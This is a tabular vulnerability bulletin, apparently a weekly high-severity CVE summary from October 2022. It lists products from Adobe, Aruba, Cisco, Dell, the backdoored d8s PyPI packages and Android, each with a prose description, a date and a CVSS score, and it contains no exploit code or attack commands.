adobe — coldfusion	Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) vulnerability that could result in arbitrary file system write. Exploitation of this issue does not require user interaction, but does require administrator privileges.	2022-10-14	7.2	CVE-2022-38424 MISC
adobe — commerce	Adobe Commerce versions 2.4.4-p1 (and earlier) and 2.4.5 (and earlier) are affected by a Stored Cross-site Scripting vulnerability. Exploitation of this issue does not require user interaction and could result in a post-authentication arbitrary code execution.	2022-10-14	10	CVE-2022-35698 MISC
adobe — dimension	Adobe Dimension versions 3.4.5 is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2022-10-14	7.8	CVE-2022-38440 MISC
adobe — dimension	Adobe Dimension versions 3.4.5 is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2022-10-14	7.8	CVE-2022-38442 MISC
adobe — dimension	Adobe Dimension versions 3.4.5 is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2022-10-14	7.8	CVE-2022-38446 MISC
adobe — dimension	Adobe Dimension versions 3.4.5 is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2022-10-14	7.8	CVE-2022-38441 MISC
adobe — dimension	Adobe Dimension versions 3.4.5 is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2022-10-14	7.8	CVE-2022-38447 MISC
adobe — dimension	Adobe Dimension versions 3.4.5 is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2022-10-14	7.8	CVE-2022-38448 MISC
apache — shiro	Apache Shiro before 1.10.0, Authentication Bypass Vulnerability in Shiro when forwarding or including via RequestDispatcher.	2022-10-12	9.8	CVE-2022-40664 CONFIRM MLIST MLIST MLIST
arraynetworks — arrayos_ag	Array Networks AG/vxAG with ArrayOS AG before 9.4.0.469 allows unauthenticated command injection that leads to privilege escalation and control of the system. NOTE: ArrayOS AG 10.x is unaffected.	2022-10-13	9.8	CVE-2022-42897 MISC MISC
arubanetworks — instant	There are buffer overflow vulnerabilities in multiple underlying services that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba Networks AP management protocol) UDP port (8211). Successful exploitation of these vulnerabilities results in the ability to execute arbitrary code as a privileged user on the underlying operating system of Aruba InstantOS 6.4.x: 6.4.4.8-4.2.4.20 and below; Aruba InstantOS 6.5.x: 6.5.4.23 and below; Aruba InstantOS 8.6.x: 8.6.0.18 and below; Aruba InstantOS 8.7.x: 8.7.1.9 and below; Aruba InstantOS 8.10.x: 8.10.0.1 and below; ArubaOS 10.3.x: 10.3.1.0 and below; Aruba has released upgrades for Aruba InnstantOS that address these security vulnerabilities.	2022-10-07	9.8	CVE-2022-37885 MISC
arubanetworks — instant	There are buffer overflow vulnerabilities in multiple underlying services that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba Networks AP management protocol) UDP port (8211). Successful exploitation of these vulnerabilities results in the ability to execute arbitrary code as a privileged user on the underlying operating system of Aruba InstantOS 6.4.x: 6.4.4.8-4.2.4.20 and below; Aruba InstantOS 6.5.x: 6.5.4.23 and below; Aruba InstantOS 8.6.x: 8.6.0.18 and below; Aruba InstantOS 8.7.x: 8.7.1.9 and below; Aruba InstantOS 8.10.x: 8.10.0.1 and below; ArubaOS 10.3.x: 10.3.1.0 and below; Aruba has released upgrades for Aruba InnstantOS that address these security vulnerabilities.	2022-10-07	9.8	CVE-2022-37886 MISC
arubanetworks — instant	There are buffer overflow vulnerabilities in multiple underlying services that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba Networks AP management protocol) UDP port (8211). Successful exploitation of these vulnerabilities results in the ability to execute arbitrary code as a privileged user on the underlying operating system of Aruba InstantOS 6.4.x: 6.4.4.8-4.2.4.20 and below; Aruba InstantOS 6.5.x: 6.5.4.23 and below; Aruba InstantOS 8.6.x: 8.6.0.18 and below; Aruba InstantOS 8.7.x: 8.7.1.9 and below; Aruba InstantOS 8.10.x: 8.10.0.1 and below; ArubaOS 10.3.x: 10.3.1.0 and below; Aruba has released upgrades for Aruba InnstantOS that address these security vulnerabilities.	2022-10-07	9.8	CVE-2022-37887 MISC
arubanetworks — instant	There are buffer overflow vulnerabilities in multiple underlying services that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba Networks AP management protocol) UDP port (8211). Successful exploitation of these vulnerabilities results in the ability to execute arbitrary code as a privileged user on the underlying operating system of Aruba InstantOS 6.4.x: 6.4.4.8-4.2.4.20 and below; Aruba InstantOS 6.5.x: 6.5.4.23 and below; Aruba InstantOS 8.6.x: 8.6.0.18 and below; Aruba InstantOS 8.7.x: 8.7.1.9 and below; Aruba InstantOS 8.10.x: 8.10.0.1 and below; ArubaOS 10.3.x: 10.3.1.0 and below; Aruba has released upgrades for Aruba InnstantOS that address these security vulnerabilities.	2022-10-07	9.8	CVE-2022-37889 MISC
arubanetworks — instant	Unauthenticated buffer overflow vulnerabilities exist within the Aruba InstantOS and ArubaOS 10 web management interface. Successful exploitation results in the execution of arbitrary commands on the underlying operating system of Aruba InstantOS 6.4.x: 6.4.4.8-4.2.4.20 and below; Aruba InstantOS 6.5.x: 6.5.4.23 and below; Aruba InstantOS 8.6.x: 8.6.0.18 and below; Aruba InstantOS 8.7.x: 8.7.1.9 and below; Aruba InstantOS 8.10.x: 8.10.0.1 and below; ArubaOS 10.3.x: 10.3.1.0 and below; Aruba has released upgrades for Aruba InnstantOS that address these security vulnerabilities.	2022-10-07	9.8	CVE-2022-37890 MISC
arubanetworks — instant	Unauthenticated buffer overflow vulnerabilities exist within the Aruba InstantOS and ArubaOS 10 web management interface. Successful exploitation results in the execution of arbitrary commands on the underlying operating system of Aruba InstantOS 6.4.x: 6.4.4.8-4.2.4.20 and below; Aruba InstantOS 6.5.x: 6.5.4.23 and below; Aruba InstantOS 8.6.x: 8.6.0.18 and below; Aruba InstantOS 8.7.x: 8.7.1.9 and below; Aruba InstantOS 8.10.x: 8.10.0.1 and below; ArubaOS 10.3.x: 10.3.1.0 and below; Aruba has released upgrades for Aruba InnstantOS that address these security vulnerabilities.	2022-10-07	9.8	CVE-2022-37891 MISC
arubanetworks — instant	An authenticated command injection vulnerability exists in the Aruba InstantOS and ArubaOS 10 command line interface. Successful exploitation of this vulnerability results in the ability to execute arbitrary commands as a privileged user on the underlying operating system of Aruba InstantOS 6.4.x: 6.4.4.8-4.2.4.20 and below; Aruba InstantOS 6.5.x: 6.5.4.23 and below; Aruba InstantOS 8.6.x: 8.6.0.18 and below; Aruba InstantOS 8.7.x: 8.7.1.9 and below; Aruba InstantOS 8.10.x: 8.10.0.1 and below; ArubaOS 10.3.x: 10.3.1.0 and below; Aruba has released upgrades for Aruba InstantOS that address this security vulnerability.	2022-10-07	7.8	CVE-2022-37893 MISC
autodesk — revit	A maliciously crafted TIF, PICT, TGA, or RLC files in Autodesk Image Processing component may be forced to read beyond allocated boundaries when parsing the TIFF, PICT, TGA, or RLC files. This vulnerability may be exploited to execute arbitrary code.	2022-10-07	7.8	CVE-2021-40162 MISC
autodesk — revit	A Memory Corruption vulnerability may lead to code execution through maliciously crafted DLL files through Autodesk Image Processing component.	2022-10-07	7.8	CVE-2021-40163 MISC
autodesk — revit	A heap-based buffer overflow could occur while parsing TIFF, PICT, TGA, or RLC files. This vulnerability may be exploited to execute arbitrary code.	2022-10-07	7.8	CVE-2021-40164 MISC
autodesk — revit	A maliciously crafted TIFF, PICT, TGA, or RLC file in Autodesk Image Processing component may be used to write beyond the allocated buffer while parsing TIFF, PICT, TGA, or RLC files. This vulnerability may be exploited to execute arbitrary code.	2022-10-07	7.8	CVE-2021-40165 MISC
autodesk — revit	A maliciously crafted PNG file in Autodesk Image Processing component may be used to attempt to free an object that has already been freed while parsing them. This vulnerability may be exploited by attackers to execute arbitrary code.	2022-10-07	7.8	CVE-2021-40166 MISC
bentley — microstation	Bentley MicroStation and MicroStation-based applications may be affected by out-of-bounds read and stack overflow issues when opening crafted SKP files. Exploiting these issues could lead to information disclosure and code execution. The fixed versions are 10.17.01.58* for MicroStation and 10.17.01.19* for Bentley View.	2022-10-13	7.8	CVE-2022-42899 MISC
bentley — microstation	Bentley MicroStation and MicroStation-based applications may be affected by out-of-bounds read issues when opening crafted FBX files. Exploiting these issues could lead to information disclosure and code execution. The fixed versions are 10.17.01.58* for MicroStation and 10.17.01.19* for Bentley View.	2022-10-13	7.8	CVE-2022-42900 MISC
bentley — microstation	Bentley MicroStation and MicroStation-based applications may be affected by out-of-bounds and stack overflow issues when opening crafted XMT files. Exploiting these issues could lead to information disclosure and code execution. The fixed versions are 10.17.01.58* for MicroStation and 10.17.01.19* for Bentley View.	2022-10-13	7.8	CVE-2022-42901 MISC
boodskap — iot_platform	Boodskap IoT Platform v4.4.9-02 allows attackers to escalate privileges via a crafted request sent to /api/user/upsert/<uuid>.	2022-10-13	8.8	CVE-2022-35135 MISC
browserify-shim_project — browserify-shim	Prototype pollution vulnerability in function resolveShims in resolve-shims.js in thlorenz browserify-shim 3.8.15 via the k variable in resolve-shims.js.	2022-10-11	9.8	CVE-2022-37617 MISC MISC MISC
cassianetworks — access_controller	An attacker may be able to use minify route with a relative path to view any file on the Cassia Networks Access Controller prior to 2.0.1.	2022-10-14	7.5	CVE-2021-22685 CONFIRM CONFIRM
church_management_system_project — church_management_system	An arbitrary file upload vulnerability in the /admin/admin_pic.php component of Church Management System v1.0 allows attackers to execute arbitrary code via a crafted PHP file.	2022-10-12	7.2	CVE-2022-41406 MISC
cisco — ios	A vulnerability in the SSH implementation of Cisco IOS Software and Cisco IOS XE Software could allow an authenticated, remote attacker to cause an affected device to reload. This vulnerability is due to improper handling of resources during an exceptional situation. An attacker could exploit this vulnerability by continuously connecting to an affected device and sending specific SSH requests. A successful exploit could allow the attacker to cause the affected device to reload.	2022-10-10	7.7	CVE-2022-20920 CISCO
cisco — ios_xe	A vulnerability in the DNS application layer gateway (ALG) functionality that is used by Network Address Translation (NAT) in Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause an affected device to reload. This vulnerability is due to a logic error that occurs when an affected device inspects certain TCP DNS packets. An attacker could exploit this vulnerability by sending crafted DNS packets through the affected device that is performing NAT for DNS packets. A successful exploit could allow the attacker to cause the device to reload, resulting in a denial of service (DoS) condition on the affected device. Note: This vulnerability can be exploited only by sending IPv4 TCP packets through an affected device. This vulnerability cannot be exploited by sending IPv6 traffic.	2022-10-10	8.6	CVE-2022-20837 CISCO
cisco — ios_xe	A vulnerability in the egress MPLS packet processing function of Cisco IOS XE Software for Cisco Catalyst 3650, Catalyst 3850, and Catalyst 9000 Family Switches could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. This vulnerability is due to insufficient input validation of IPv4 traffic. An attacker could exploit this vulnerability by sending a malformed packet out of an affected MPLS-enabled interface. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition.	2022-10-10	8.6	CVE-2022-20870 CISCO
cisco — ios_xe	A vulnerability in the implementation of IPv6 VPN over MPLS (6VPE) with Zone-Based Firewall (ZBFW) of Cisco IOS XE Software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to improper error handling of an IPv6 packet that is forwarded from an MPLS and ZBFW-enabled interface in a 6VPE deployment. An attacker could exploit this vulnerability by sending a crafted IPv6 packet sourced from a device on the IPv6-enabled virtual routing and forwarding (VRF) interface through the affected device. A successful exploit could allow the attacker to reload the device, resulting in a DoS condition.	2022-10-10	7.4	CVE-2022-20915 CISCO
clippercms — clippercms	ClipperCMS 1.3.3 was discovered to contain a Server-Side Request Forgery (SSRF) via the rss_url_news parameter at /manager/index.php.	2022-10-13	9.8	CVE-2022-41495 MISC
clippercms — clippercms	ClipperCMS 1.3.3 was discovered to contain a Server-Side Request Forgery (SSRF) via the pkg_url parameter at /manager/index.php.	2022-10-13	9.8	CVE-2022-41497 MISC
dedecms — dedecms	DedeCMS V5.7.99 was discovered to contain an arbitrary file upload vulnerability via the component /dede/file_manage_control.php.	2022-10-12	7.2	CVE-2022-40921 MISC
dell — alienware_area-51_r5_firmware	Dell BIOS contains a use of uninitialized variable vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.	2022-10-12	7.8	CVE-2022-34390 MISC
dell — alienware_area-51_r5_firmware	Dell Client BIOS Versions prior to the remediated version contain an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.	2022-10-12	7.8	CVE-2022-34391 MISC
dell — alienware_area_51m_r1_firmware	Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.	2022-10-12	7.8	CVE-2022-32485 MISC
dell — alienware_area_51m_r1_firmware	Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.	2022-10-12	7.8	CVE-2022-32487 MISC
dell — alienware_area_51m_r1_firmware	Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.	2022-10-12	7.8	CVE-2022-32488 MISC
dell — alienware_area_51m_r1_firmware	Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.	2022-10-12	7.8	CVE-2022-32489 MISC
dell — alienware_area_51m_r1_firmware	Dell Client BIOS contains a Buffer Overflow vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by manipulating an SMI to cause an arbitrary write during SMM.	2022-10-12	7.8	CVE-2022-32491 MISC
dell — alienware_area_51m_r1_firmware	Dell BIOS contains an Stack-Based Buffer Overflow vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.	2022-10-12	7.8	CVE-2022-32493 MISC
dell — bios	Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.	2022-10-11	8.8	CVE-2022-32486 MISC
dell — bios	Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.	2022-10-11	8.8	CVE-2022-32492 MISC
dell — container_storage_modules	Dell Container Storage Modules 1.2 contains an Improper Limitation of a Pathname to a Restricted Directory in goiscsi and gobrick libraries which could lead to OS command injection. A remote unauthenticated attacker could exploit this vulnerability leading to unintentional access to path outside of restricted directory.	2022-10-11	8.8	CVE-2022-34426 MISC
dell — container_storage_modules	Dell Container Storage Modules 1.2 contains an OS Command Injection in goiscsi and gobrick libraries. A remote unauthenticated attacker could exploit this vulnerability leading to modification of intended OS command execution.	2022-10-11	8.8	CVE-2022-34427 MISC
dell — enterprise_sonic_distribution	Dell Enterprise SONiC OS, 4.0.0, 4.0.1, contain a cryptographic key vulnerability in SSH. An unauthenticated remote attacker could potentially exploit this vulnerability, leading to unauthorized access to communication.	2022-10-10	7.5	CVE-2022-34425 MISC
dell — geodrive	Dell GeoDrive, versions 2.1 – 2.2, contains an information disclosure vulnerability in GUI. An authenticated non-admin user could potentially exploit this vulnerability and view sensitive information.	2022-10-12	7.8	CVE-2022-33919 MISC
dell — geodrive	Dell GeoDrive, versions prior to 2.2, contains an Unquoted File Path vulnerability. A low privilege attacker could potentially exploit this vulnerability, leading to the execution of arbitrary code in the SYSTEM security context.	2022-10-12	7.8	CVE-2022-33920 MISC
dell — geodrive	Dell GeoDrive, versions prior to 2.2, contains Multiple DLL Hijacking Vulnerabilities. A low privilege attacker could potentially exploit this vulnerability, leading to the execution of arbitrary code in the SYSTEM security context.	2022-10-12	7.8	CVE-2022-33921 MISC
dell — geodrive	Dell GeoDrive, versions prior to 2.2, contains Insecure File and Folder Permissions vulnerabilities. A low privilege attacker could potentially exploit this vulnerability, leading to the execution of arbitrary code in the SYSTEM security context. Dell recommends customers to upgrade at the earliest opportunity.	2022-10-12	7.8	CVE-2022-33922 MISC
dell — geodrive	Dell GeoDrive, Versions 1.0 – 2.2, contain a Path Traversal Vulnerability in the reporting function. A local, low privileged attacker could potentially exploit this vulnerability, to gain unauthorized delete access to the files stored on the server filesystem, with the privileges of the GeoDrive service: NT AUTHORITYSYSTEM.	2022-10-12	7.1	CVE-2022-33937 MISC
dell — hybrid_client	Dell Hybrid Client below 1.8 version contains a gedit vulnerability. A guest attacker could potentially exploit this vulnerability, allowing deletion of user and some system files and folders.	2022-10-11	8.2	CVE-2022-34432 MISC
dell — hybrid_client	Dell Hybrid Client below 1.8 version contains a Zip Bomb Vulnerability in UI. A guest privilege attacker could potentially exploit this vulnerability, leading to system files modification.	2022-10-11	7.5	CVE-2022-34430 MISC
dell — xtremio_management_server	Dell EMC XtremIO versions prior to X2 6.4.0-22 contain a bruteforce vulnerability. A remote unauthenticated attacker can potentially exploit this vulnerability and gain access to an admin account.	2022-10-12	9.8	CVE-2022-31228 MISC
democritus — d8s-algorithms	The d8s-algorithms package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-dicts package. The affected version is 0.1.0.	2022-10-11	9.8	CVE-2022-42040 MISC MISC MISC
democritus — d8s-archives	The d8s-archives package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-file-system package. The affected version is 0.1.0.	2022-10-11	9.8	CVE-2022-41383 MISC MISC MISC
democritus — d8s-asns	The d8s-asns package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-csv package. The affected version is 0.1.0.	2022-10-11	9.8	CVE-2022-42037 MISC MISC MISC
democritus — d8s-asns	The d8s-asns package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-html package. The affected version is 0.1.0.	2022-10-11	9.8	CVE-2022-42044 MISC MISC MISC
democritus — d8s-domains	The d8s-domains package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-urls package. The affected version is 0.1.0.	2022-10-11	9.8	CVE-2022-41384 MISC MISC MISC
democritus — d8s-file-system	The d8s-file-system package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-hashes package. The affected version is 0.1.0.	2022-10-11	9.8	CVE-2022-42041 MISC MISC MISC
democritus — d8s-html	The d8s-html package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-urls package. The affected version is 0.1.0.	2022-10-11	9.8	CVE-2022-41385 MISC MISC MISC
democritus — d8s-ip-addresses	The d8s-ip-addresses package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-csv package. The affected version is 0.1.0.	2022-10-11	9.8	CVE-2022-42038 MISC MISC MISC
democritus — d8s-json	The d8s-json package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-file-system package. The affected version is 0.1.0.	2022-10-11	9.8	CVE-2022-41382 MISC MISC MISC
democritus — d8s-lists	The d8s-lists package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-dicts package. The affected version is 0.1.0.	2022-10-11	9.8	CVE-2022-42039 MISC MISC MISC
democritus — d8s-networking	The d8s-networking package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-hashes package. The affected version is 0.1.0.	2022-10-11	9.8	CVE-2022-42042 MISC MISC MISC
democritus — d8s-pdfs	The d8s-pdfs package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-urls package. The affected version is 0.1.0.	2022-10-11	9.8	CVE-2022-41387 MISC MISC MISC
democritus — d8s-urls	The d8s-urls package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-csv package. The affected version is 0.1.0.	2022-10-11	9.8	CVE-2022-42036 MISC MISC MISC
democritus — d8s-utility	The d8s-utility package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-file-system package. The affected version is 0.1.0.	2022-10-11	9.8	CVE-2022-41381 MISC MISC MISC
democritus — d8s-utility	The d8s-utility package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-urls package. The affected version is 0.1.0.	2022-10-11	9.8	CVE-2022-41386 MISC MISC MISC
democritus — d8s-xml	The d8s-xml package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-html package. The affected version is 0.1.0.	2022-10-11	9.8	CVE-2022-42043 MISC MISC MISC
democritus — d8s-yaml	The d8s-yaml package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-file-system package. The affected version is 0.1.0.	2022-10-11	9.8	CVE-2022-41380 MISC MISC MISC
django-mfa2_project — django-mfa2	mfa/FIDO2.py in django-mfa2 before 2.5.1 and 2.6.x before 2.6.1 allows a replay attack that could be used to register another device for a user. The device registration challenge is not invalidated after usage.	2022-10-11	7.5	CVE-2022-42731 MISC MISC MISC
dolibarr — dolibarr_erp/crm	Dolibarr ERP & CRM <=15.0.3 is vulnerable to Eval injection. By default, any administrator can be added to the installation page of dolibarr, and if successfully added, malicious code can be inserted into the database and then execute it by eval.	2022-10-12	9.8	CVE-2022-40871 MISC
dotpdn — paint.net	dotPDN Paint.NET before 4.1.2 allows Deserialization of Untrusted Data (issue 1 of 2).	2022-10-12	9.8	CVE-2018-18446 MISC MISC MISC
dotpdn — paint.net	dotPDN Paint.NET before 4.1.2 allows Deserialization of Untrusted Data (issue 2 of 2).	2022-10-12	9.8	CVE-2018-18447 MISC MISC MISC
dropbear_ssh_project — dropbear_ssh	An issue was discovered in Dropbear through 2020.81. Due to a non-RFC-compliant check of the available authentication methods in the client-side SSH code, it is possible for an SSH server to change the login process in its favor. This attack can bypass additional security measures such as FIDO2 tokens or SSH-Askpass. Thus, it allows an attacker to abuse a forwarded agent for logging on to another server unnoticed.	2022-10-12	7.5	CVE-2021-36369 MISC MISC MISC
f-secure — elements_endpoint_protection	Multiple Denial-of-Service (DoS) vulnerability was discovered in F-Secure & WithSecure products whereby the aerdl.dll unpacker handler function crashes. This can lead to a possible scanning engine crash.	2022-10-12	7.5	CVE-2022-28887 MISC MISC
facebook — hermes	An out of bounds write in hermes, while handling large arrays, prior to commit 06eaec767e376bfdb883d912cb15e987ddf2bda1 allows attackers to potentially execute arbitrary code via crafted JavaScript. Note that this is only exploitable if the application using Hermes permits evaluation of untrusted JavaScript. Hence, most React Native applications are not affected.	2022-10-11	9.8	CVE-2022-32234 CONFIRM CONFIRM
facebook — hermes	A write-what-where condition in hermes caused by an integer overflow, prior to commit 5b6255ae049fa4641791e47fad994e8e8c4da374 allows attackers to potentially execute arbitrary code via crafted JavaScript. Note that this is only exploitable if the application using Hermes permits evaluation of untrusted JavaScript. Hence, most React Native applications are not affected.	2022-10-11	9.8	CVE-2022-35289 CONFIRM CONFIRM
facebook — hermes	An integer conversion error in Hermes bytecode generation, prior to commit 6aa825e480d48127b480b08d13adf70033237097, could have been used to perform Out-Of-Bounds operations and subsequently execute arbitrary code. Note that this is only exploitable in cases where Hermes is used to execute untrusted JavaScript. Hence, most React Native applications are not affected.	2022-10-11	9.8	CVE-2022-40138 CONFIRM CONFIRM
fastify — fastify	fastify is a fast and low overhead web framework, for Node.js. Affected versions of fastify are subject to a denial of service via malicious use of the Content-Type header. An attacker can send an invalid Content-Type header that can cause the application to crash. This issue has been addressed in commit `fbb07e8d` and will be included in release version 4.8.1. Users are advised to upgrade. Users unable to upgrade may manually filter out http content with malicious Content-Type headers.	2022-10-10	7.5	CVE-2022-39288 CONFIRM MISC MISC
foresightsports — gc3_launch_monitor_firmware	Foresight GC3 Launch Monitor 1.3.15.68 ships with a Target Communication Framework (TCF) service enabled. This service listens on a TCP port on all interfaces and allows for process debugging, file system modification, and terminal access as the root user. In conjunction with a hosted wireless access point and the known passphrase of FSSPORTS, an attacker could use this service to modify a device and steal intellectual property.	2022-10-13	8	CVE-2022-40187 MISC MISC MISC MISC
fortinet — fortios	A improper neutralization of special elements used in an os command (‘os command injection’) in Fortinet FortiOS version 6.0.0 through 6.0.14, FortiOS version 6.2.0 through 6.2.10, FortiOS version 6.4.0 through 6.4.8, FortiOS version 7.0.0 through 7.0.3 allows attacker to execute privileged commands on a linked FortiSwitch via diagnostic CLI commands.	2022-10-10	8	CVE-2021-44171 CONFIRM
freerdp — freerdp	FreeRDP is a free remote desktop protocol library and clients. FreeRDP based clients on unix systems using `/parallel` command line switch might read uninitialized data and send it to the server the client is currently connected to. FreeRDP based server implementations are not affected. Please upgrade to 2.8.1 where this issue is patched. If unable to upgrade, do not use parallel port redirection (`/parallel` command line switch) as a workaround.	2022-10-12	7.5	CVE-2022-39282 MISC CONFIRM
freerdp — freerdp	FreeRDP is a free remote desktop protocol library and clients. All FreeRDP based clients when using the `/video` command line switch might read uninitialized data, decode it as audio/video and display the result. FreeRDP based server implementations are not affected. This issue has been patched in version 2.8.1. If you cannot upgrade do not use the `/video` switch.	2022-10-12	7.5	CVE-2022-39283 MISC CONFIRM
gh-pages_project — gh-pages	Prototype pollution vulnerability in tschaub gh-pages 3.1.0 via the partial variable in util.js.	2022-10-12	9.8	CVE-2022-37611 MISC MISC MISC
gogs — gogs	In Gogs, versions v0.6.5 through v0.12.10 are vulnerable to Stored Cross-Site Scripting (XSS) that leads to an account takeover.	2022-10-11	9	CVE-2022-32174 MISC MISC
google — android	In CarSettings of app packages, there is a possible permission bypass due to a confused deputy. This could lead to local escalation of privilege in Bluetooth settings with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-220741473	2022-10-11	8.8	CVE-2022-20429 MISC
google — android	In HTBLogKM of TBD, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege in the kernel with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-242345178	2022-10-14	7.8	CVE-2021-0699 MISC
google — android	In DevmemIntHeapAcquire of TBD, there is a possible arbitrary code execution due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-242345085	2022-10-11	7.8	CVE-2021-0951 MISC
google — android	In SitRilClient_OnResponse of SitRilSe.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-223086933References: N/A	2022-10-14	7.8	CVE-2022-20397 MISC
google — android	In handleFullScreenIntent of StatusBarNotificationActivityStarter.java, there is a possible bypass of the restriction of starting activity from background due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-231322873	2022-10-11	7.8	CVE-2022-20415 MISC
google — android	In audioTransportsToHal of HidlUtils.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12 Android-12L Android-13Android ID: A-237717857	2022-10-11	7.8	CVE-2022-20416 MISC
google — android	In audioTransportsToHal of HidlUtils.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12 Android-12L Android-13Android ID: A-237288416	2022-10-11	7.8	CVE-2022-20417 MISC
google — android	In setOptions of ActivityRecord.java, there is a possible load any arbitrary Java code into launcher process due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12L Android-13Android ID: A-237290578	2022-10-11	7.8	CVE-2022-20419 MISC
google — android	In getBackgroundRestrictionExemptionReason of AppRestrictionController.java, there is a possible way to bypass device policy restrictions due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-238377411	2022-10-11	7.8	CVE-2022-20420 MISC
google — android	In binder_inc_ref_for_node of binder.c, there is a possible way to corrupt memory due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-239630375References: Upstream kernel	2022-10-11	7.8	CVE-2022-20421 MISC
google — android	There is an missing authorization issue in the system service. Since the component does not have permission check , resulting in Local Elevation of privilege.Product: AndroidVersions: Android SoCAndroid ID: A-242221233	2022-10-11	7.8	CVE-2022-20430 MISC
google — android	There is an missing authorization issue in the system service. Since the component does not have permission check , resulting in Local Elevation of privilege.Product: AndroidVersions: Android SoCAndroid ID: A-242221238	2022-10-11	7.8	CVE-2022-20431 MISC
google — android	There is an missing authorization issue in the system service. Since the component does not have permission check and permission protection,, resulting in Local Elevation of privilege.Product: AndroidVersions: Android SoCAndroid ID: A-242221899	2022-10-11	7.8	CVE-2022-20432 MISC
